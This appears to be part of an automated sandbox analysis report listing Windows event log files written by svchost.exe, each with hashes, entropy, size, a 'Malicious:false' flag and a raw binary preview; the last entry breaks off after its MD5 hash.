                                          SHA-512:8A6604FDF680757E759661A1585C42AF93099AAB1C26D7A8CFBC1228A3F49ABFAE05BEDB17DA7BA893FC07F875629113D6F2319808F19B3E21639A8061B11BC8
                                          Malicious:false
                                          Preview:ElfChnk.Y.......g.......Y.......g............%...&.._5......................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............................................................s.......................**......f.......B.z...............................................................................f.......~.....!.....z..........@B.z.......&O......'O....x.......f........................$.N......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.C.o.m.m.o.n.-.S.t.a.r.t.L.a.y.o.u.t.P.o.p.u.l.a.t.i.o.n.B.....K..p...1.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.h.e.l.l.C.o.m.m.o.n.-.S.t.a.r.t.L.a.y.o.u.t.P.o.p.u.l.a.t.i.o.n./.O.p.e.r.a.t.i.o.n.a.l......Ls..............**......g.......4u......
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):2.1499045494600955
                                          Encrypted:false
                                          SSDEEP:384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
                                          MD5:2045FB0D54CA8F456B545859B9F9B0A8
                                          SHA1:35854F87588C367DE32A3931E01BC71535E3F400
                                          SHA-256:E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
                                          SHA-512:013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
                                          Malicious:false
                                          Preview:ElfChnk.........;...............;...........xk...m...+.....................................................................F.~.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................6f..w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.8164696340947971
                                          Encrypted:false
                                          SSDEEP:384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
                                          MD5:1AB19FA472669F4334C7A9D44E94E1B3
                                          SHA1:F71C16706CFA9930045C9A888FDB3EF46CACC5BC
                                          SHA-256:549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
                                          SHA-512:72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
                                          Malicious:false
                                          Preview:ElfChnk...................................... ..x$../..........................................................................<................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................!..................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.9855903635327656
                                          Encrypted:false
                                          SSDEEP:384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
                                          MD5:7BCA54AC75C7185ADFBB42B1A84F86E3
                                          SHA1:AD91EE55A6F9F77AD871ACA9A5B59987CA679968
                                          SHA-256:A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
                                          SHA-512:79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
                                          Malicious:false
                                          Preview:ElfChnk.....................................P+...,...0........................................................................9.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F...........................U.......................%%......&...................................................>...........................E.......**..............o.m...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):3.165454452307923
                                          Encrypted:false
                                          SSDEEP:384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
                                          MD5:B6B6F199DA64422984403D7374F32528
                                          SHA1:980D66401DFCCF96ADDDAF22334A5CE735554E7F
                                          SHA-256:8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
                                          SHA-512:5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
                                          Malicious:false
                                          Preview:ElfChnk.........'...............'...........P.......H:Z.....................................................................gO.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................f..................................**..............m.................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):3.8519554794255333
                                          Encrypted:false
                                          SSDEEP:384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
                                          MD5:4140628CA3CEC29C0B506CEEBDF684F6
                                          SHA1:A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
                                          SHA-256:1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
                                          SHA-512:779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
                                          Malicious:false
                                          Preview:ElfChnk.\...............\.......................0..../........................................................................v................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):1.1642919553794224
                                          Encrypted:false
                                          SSDEEP:384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
                                          MD5:D7EECF043241FDB9486580582E208603
                                          SHA1:045D5672A8E9884B78CD31C52D372375503CBF4F
                                          SHA-256:6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
                                          SHA-512:6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
                                          Malicious:false
                                          Preview:ElfChnk.....................................02..h6...u'.....................................................................1..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................V2............................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):83616
                                          Entropy (8bit):4.582831421581963
                                          Encrypted:false
                                          SSDEEP:768:1uDIZi8Ns5iLV8gRai8ZijiTEOmGkoeiDpbiE:T+Jao7mce8pP
                                          MD5:D1DEEB543797B5593601E7E484D510D9
                                          SHA1:339260952CECAA5533A104AFD555AEC8E5E68998
                                          SHA-256:4A595EA63B1D5DFD2222FD0E7B3147A6665C32F2DAEBA902583105A4A4B2580B
                                          SHA-512:4F6BD4AD330295D5E7F50C42078E2874115C3BB988F9D13BCE8BF37665633DCEB07D8F58A0087A0652EED16BB521C5064B272EE32B30B64E82986101F28C22B4
                                          Malicious:false
                                          Preview:ElfChnk.........................................h ...........................................................................Q..........................................4...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..0...........c4k...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 15, DIRTY
                                          Category:dropped
                                          Size (bytes):79016
                                          Entropy (8bit):1.8195973326963628
                                          Encrypted:false
                                          SSDEEP:384:y6hL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUmXcUmYhL6UsE0ZZ:JY7LG5Y7LG
                                          MD5:27689044C17827F377D9272DE60F385E
                                          SHA1:F2F1AD0E97CDF652DDD113D075026E0235F61D3C
                                          SHA-256:2A6658A95CB5DB69D5ECEFEC6EF8A9D216E5A5C98DFD3CE41F3366ACC7516298
                                          SHA-512:0D4B703DA308D33B50E2D9B0EDCE7290F7633DF05FC99623FDDDC5CE6EB6D472A8CD2FCC696FC81C2A187CF2A08AC7544CF7C8BC3F45540FE1554FF74D9E354D
                                          Malicious:false
                                          Preview:ElfFile.....................................................................................................................\>.eElfChnk....................................../..(4...}}.....................................................................>ld................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&..................................................................................../..................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):67776
                                          Entropy (8bit):0.36733085249681147
                                          Encrypted:false
                                          SSDEEP:96:K5KNVaO80oIdW/6Fg55KNVaO80oIdW/6Fg:K58V7giFg558V7giFg
                                          MD5:91374FAFBCE65CC199141B9E828F43F4
                                          SHA1:9A6658CF416BC5B79191DE3501DF34D13F460307
                                          SHA-256:9C657F7E1A2A352629E5C0DEC63D2EC7827EA13446BAFF70E16C0D5B07465DDD
                                          SHA-512:9C40A768C2FCAC2809165B5526D287FC4742206E557F47A78CE84EE208597910473B8208FF983CB8FEC70AEDAFC3E212028BD131BEFD63AF052B962192849960
                                          Malicious:false
                                          Preview:ElfChnk................................................F.......................................................................2................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**...............&f...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):1.6469884746870727
                                          Encrypted:false
                                          SSDEEP:384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
                                          MD5:FC81D9FBA555C6BC7223594B8F6B46DE
                                          SHA1:971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
                                          SHA-256:9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
                                          SHA-512:7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
                                          Malicious:false
                                          Preview:ElfChnk.y...............y................... Q..(S...b.......................................................................t..............................................=.......................#...................................................................................................f...............?.......................P.......................M...F...............................................................................................................VG..................................**......y..........:............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):3.408089844366563
                                          Encrypted:false
                                          SSDEEP:768:ila0Nva3aXaraLaDaraPajaza/a3aba3araPa9pafaDa7aTa7aTa7arababaLaz6:qN
                                          MD5:CBD26A0BFB1B17BC56759F9B16C969FB
                                          SHA1:A5830EC36FF48806E2C2FDA2346EA4F6E6B7C77E
                                          SHA-256:A5621C687F79A765371D1EE90DAA61DE6DC0A9520AC9011E48BF39D70841964A
                                          SHA-512:28F841B8DFBC129E1D5B34630A174A456FAA92004249423BDAF25EB946FC72A1BD24691964C81179A2E1D1FCA7885192A5476BE3CDE3818BC9D57F2A568AC809
                                          Malicious:false
                                          Preview:ElfChnk.........@...............@...............`...4_.2.....................................................................+.|................`...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................9...................................**..H...........1.I...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):1.3132453844344478
                                          Encrypted:false
                                          SSDEEP:384:hhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJnXJRXJtXJLXJjXJppXJ:hQ0yUkNYwD8imLE5nTtFpf
                                          MD5:6237EE0458A0478242B975E9BB7AA97D
                                          SHA1:6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1
                                          SHA-256:C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
                                          SHA-512:56C025C971F77AB8E911E0190E8AB5CF533A909C1BF4558876FB2761AAA381CB7D21E44A3273FA4427CB2FF7DEECC15A312DD2A424B96ABDC4886BDF233F30E9
                                          Malicious:false
                                          Preview:ElfChnk......................................<...A.........................................................................i,.q................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................<......C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):4.325262033408211
                                          Encrypted:false
                                          SSDEEP:384:6hYmn9moomUmKBmZOmZmlmmmomRmemtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfO:6/fGTDcx
                                          MD5:D13189B45679E53F5744A4D449F8B00F
                                          SHA1:ED410CAB42772E329F656B4793B46AC7159CF05B
                                          SHA-256:BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
                                          SHA-512:83399CE082F8C6D2917B8363E053C770F2783B3D086F39736919FBFA533DF65993A3B7840A2E1000B08948584CF9750C27961BF8A7BE3A235B5DDD779616013F
                                          Malicious:false
                                          Preview:ElfChnk.....................................h.................................................................................-.................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................1...........&.......................................................................................**..x...........~_g...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):0.7947046118743749
                                          Encrypted:false
                                          SSDEEP:384:jhr2zS2o202AW2D2t2l292l2V2p2d2N2:j8Q
                                          MD5:55E73A924B170FBFFF862E8E195E839A
                                          SHA1:3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0
                                          SHA-256:1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
                                          SHA-512:E14D32569F37A827EDBD1F02667866431C856D087A396933DE5E9B87943369C4802D220557050C7B0FE9367FBD0683676776E6D3CCBCB290C9F30D86EC529E28
                                          Malicious:false
                                          Preview:ElfChnk...................................... ..X"...........................................................................?.................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................3...........................&.......................................................................................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):132560
                                          Entropy (8bit):4.370455907012503
                                          Encrypted:false
                                          SSDEEP:384:LjRzRuRnxhSRumRtRqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8Rd:L6xA8nPLGbkZxA8nPLGbS
                                          MD5:E6ABB66EF952A2C26E0AB66E4E3E35FF
                                          SHA1:761DAFD03BF6DCE6C1F3C9AC9FFFDC85ECB58883
                                          SHA-256:4381ABB52467795F4B0F18797EB03B4A7C6FEEF0C2CCA650BD3BD887D9AE68FA
                                          SHA-512:BB5F01D8240562E7B1BF22B38A674515193C7A52DB9CB75057ECAD03E204B22CEB97FC824CDBE6E74C4044413EE571AB0C2ACCE2B91EFF9F0C8DCF9FC7F91278
                                          Malicious:false
                                          Preview:ElfChnk.....................................@...X............................................................................y.......................y.......x..N...........=............................................y..................}y..3...........................................c......xb..f...h.......lc..?.......................h........c......M.......M...F...9c..............................................Qb..............................................A.......i.......................&............x..**...............Y;............x68................................................................<.......T...-.!................@.Y;....../q.2.E..y.9..LP...t........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l......Qb......*...................P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.......w.m.i.p.r.v.s.e...e.x.e...P...".%.P.r.o.g.r.a.m.D.a.t.a.%.\.M.i.c
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):4.273338343434408
                                          Encrypted:false
                                          SSDEEP:384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
                                          MD5:C37372EB51AEDB4552CB839C7294403A
                                          SHA1:7B7C408D72B084CE36AA6B623AC6B907FD21D569
                                          SHA-256:C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
                                          SHA-512:69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
                                          Malicious:false
                                          Preview:ElfChnk....................................................................................................................x...........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............i.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):1.231195890775603
                                          Encrypted:false
                                          SSDEEP:384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
                                          MD5:3365A34953FD7B16667108A049B64DA5
                                          SHA1:C72421A58E063D64072152344B266F8306A78702
                                          SHA-256:AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
                                          SHA-512:A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
                                          Malicious:false
                                          Preview:ElfChnk.........!...............!............7..`8...j......................................................................@..#................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v....................................................3..................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):4.35124337150901
                                          Encrypted:false
                                          SSDEEP:384:7h+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBwH:7OqabeGTnbuSxj
                                          MD5:2D7BA746B746412B8DC92CB5B4BBA9FC
                                          SHA1:09C734B48CA58449652D0274D1E5E6E3ACE7C8F2
                                          SHA-256:3DB4D70EB057F3C6DF34CE4D0AB398CC975E38A9DF507826B1E26A88CF438F78
                                          SHA-512:43866503D232B635F8CD6DE922F05166A31A3308D9DD5164B8DD65C19BB1061F5454227518C470C0A5F1525FE8B5E2C1E2D9874FD2B8CCEC8B76BFE7B404F2EF
                                          Malicious:false
                                          Preview:ElfChnk.....................................H...x...2.k......................................................................W.}............................................=...........................................................................................................................f...............?...........................m...................M...F....................S......................................&...................................u...................................................**...............Dbf..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):65536
                                          Entropy (8bit):4.421206160086997
                                          Encrypted:false
                                          SSDEEP:384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
                                          MD5:67CAD90771EBC0BD20736201D89C1586
                                          SHA1:EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
                                          SHA-256:7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
                                          SHA-512:27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
                                          Malicious:false
                                          Preview:ElfChnk.........l...............l...............@....^.....................................................................+t].................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......Q8.......................................................6......................**...............yM..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):68120
                                          Entropy (8bit):4.327804066902123
                                          Encrypted:false
                                          SSDEEP:384:biFRIiFRCoMonS6cWNfoLSbdsLSvnQYoxMtg6Wo9MtxLo9MtMozonuoxNo/Vo1+q:gdWa1ZGg6UfAKWZ8
                                          MD5:340D78EED0ECC6DD7BCFC8FE1624A946
